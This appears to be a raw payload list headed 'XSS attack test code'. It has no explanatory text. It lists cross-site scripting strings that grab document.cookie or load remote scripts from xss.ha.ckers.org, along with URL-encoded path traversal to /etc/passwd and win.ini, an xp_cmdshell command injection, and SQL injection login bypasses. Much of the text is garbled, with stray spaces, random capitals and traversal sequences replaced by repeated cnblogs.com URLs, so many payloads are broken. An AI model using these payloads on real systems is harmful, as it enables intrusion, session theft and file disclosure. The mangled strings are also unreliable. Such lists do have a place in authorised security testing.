XSS attack test code

'> <SCRIPT> alert (document. Cookie) </SCRIPT>
= '> <SCRIPT> alert (document. Cookie) </SCRIPT>
<SCRIPT> alert (document. Cookie) </SCRIPT>
<SCRIPT> alert (vulnerable) </SCRIPT>
% 3 cscript % 3 ealert ('xss') % 3C/script % 3E
<SCRIPT> alert ('xss') </SCRIPT>

% 0a % 0a <SCRIPT> alert (\ "vulnerable \") </SCRIPT>. jsp
% 22% 3 cscript % 3 ealert (% 22xss % 22) % 3C/script % 3E
% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/etc/passwd
% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/% 2e % 2e/Windows/win. ini
% 3C/A % 3E % 3 cscript % 3 ealert (% 22xss % 22) % 3C/script % 3E
% 3C/Title % 3E % 3 cscript % 3 ealert (% 22xss % 22) % 3C/script % 3E
% 3 cscript % 3 ealert (% 22xss % 22) % 3C/script % 3E/index.html
% 3f. jsp
% 3f. jsp
<SCRIPT> alert ('vulnerable'); </SCRIPT>
<SCRIPT> alert ('vulnerable') </SCRIPT>
? SQL _debug = 1
A % 5c. aspx
A. jsp/<SCRIPT> alert ('vulnerable') </SCRIPT>
A/
A? <SCRIPT> alert ('vulnerable') </SCRIPT>
"> <SCRIPT> alert ('vulnerable') </SCRIPT>
'; Exec % 20master .. xp_cmdshell % 20' dir % 20 C: % 20> % 20c: \ Inetpub \ wwwroot \?. TXT '--&&
% 22% 3E % 3 cscript % 3 ealert (document. Cookie) % 3C/script % 3E
% 3 cscript % 3 ealert (document. domain); % 3C/script % 3E &
% 3 cscript % 3 ealert (document. domain); % 3C/script % 3E & session_id = {session_id} & session_id =
1% 20 Union % 20all % 20 select % 20 pass, from % 20 MERs % 20 where % 20 fname =
Http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
.. \ WINDOWS \ SYSTEM. ini
\ .. \ WINDOWS \ SYSTEM. ini
'';! -- "<XSS >= &{()}










" out

<SCRIPT> A =/XSS/Alert (A. Source) </SCRIPT>
<Body background = "javascript: Alert ('xss')">
<Body onload = alert ('xss')>


<Bgsound src = "javascript: Alert ('xss');">
<Br size = "& {alert ('xss')}">
<Layer src = "http://xss.ha.ckers.org/a.js"> </layer>
<LINK rel = "stylesheet" href = "javascript: Alert ('xsss');">



<Meta HTTP-EQUIV = "refresh" content = "0; url = javascript: Alert ('xss');">
<IFRAME src = javascript: Alert ('xss')> </iframe>
<Frameset> <frame src = javascript: Alert ('xsss')> </frame> </frameset>
<Table background = "javascript: Alert ('xss')">
<Div style = "background-image: URL (javascript: Alert ('xsss')">
<Div style = "behaviour: URL ('HTTP: // www.how-to-hack.org/exploit.html');">
<Div style = "width: expression (Alert ('xss');">
<Style> @ im \ port' \ ja \ Vasc \ rept: Alert ("XSS") '; </style>

<Style type = "text/JavaScript"> alert ('xsss'); </style>
<Style type = "text/CSS">. XSS {background-image: URL ("javascript: Alert ('xss')") ;}</style> <a class = "XSS"> </a>
<Style type = "text/CSS"> body {Background: URL ("javascript: Alert ('xsss')")} </style>
<Base href = "javascript: Alert ('xss'); //">
Geturl ("javascript: Alert ('xss ')")
A = "get"; B = "url"; C = "javascript:"; D = "alert ('xsss ');"; eval (A + B + C + D );
<XML src = "javascript: Alert ('xss');">
"> <Body onload =" A (); "> <SCRIPT> function a () {alert ('xsss') ;}</SCRIPT> <"
<SCRIPT src = "http://xss.ha.ckers.org/xss.jpg"> </SCRIPT>
<! -- # Exec cmd = "/bin/ECHO '<script src'" --> <! -- # Exec cmd = "/bin/ECHO '= http://xss.ha.ckers.org/a.js> </SCRIPT>'" -->

<Script a = ">" src = "http://xss.ha.ckers.org/a.js"> </SCRIPT>
<SCRIPT = ">" src = "http://xss.ha.ckers.org/a.js"> </SCRIPT>
<Script a = ">" ''src = "http://xss.ha.ckers.org/a.js"> </SCRIPT>
<Script "A = '>'" src = "http://xss.ha.ckers.org/a.js"> </SCRIPT>
<SCRIPT> document. Write ("<scri"); </SCRIPT> PT src = "http://xss.ha.ckers.org/a.js"> </SCRIPT>
<A href = http://www.gohttp: // www.google.com/ogle.com/> link </a>
Admin '--
'Or 0 = 0 --
"Or 0 = 0 --
Or 0 = 0 --
'Or 0 = 0 #
"Or 0 = 0 #
Or 0 = 0 #
'Or 'X' = 'x
"Or" x "=" x
') Or ('x' = 'x
'Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or a = --
"Or" A "="
') Or ('A' = 'a
") Or (" A "="
Hi "or" A "="
Hi "or 1 = 1 --
Hi' or 1 = 1 --
Hi 'or 'A' = 'a
Hi ') or ('A' = 'a
Hi ") or (" A "=" A [/Code]

XSS attack test code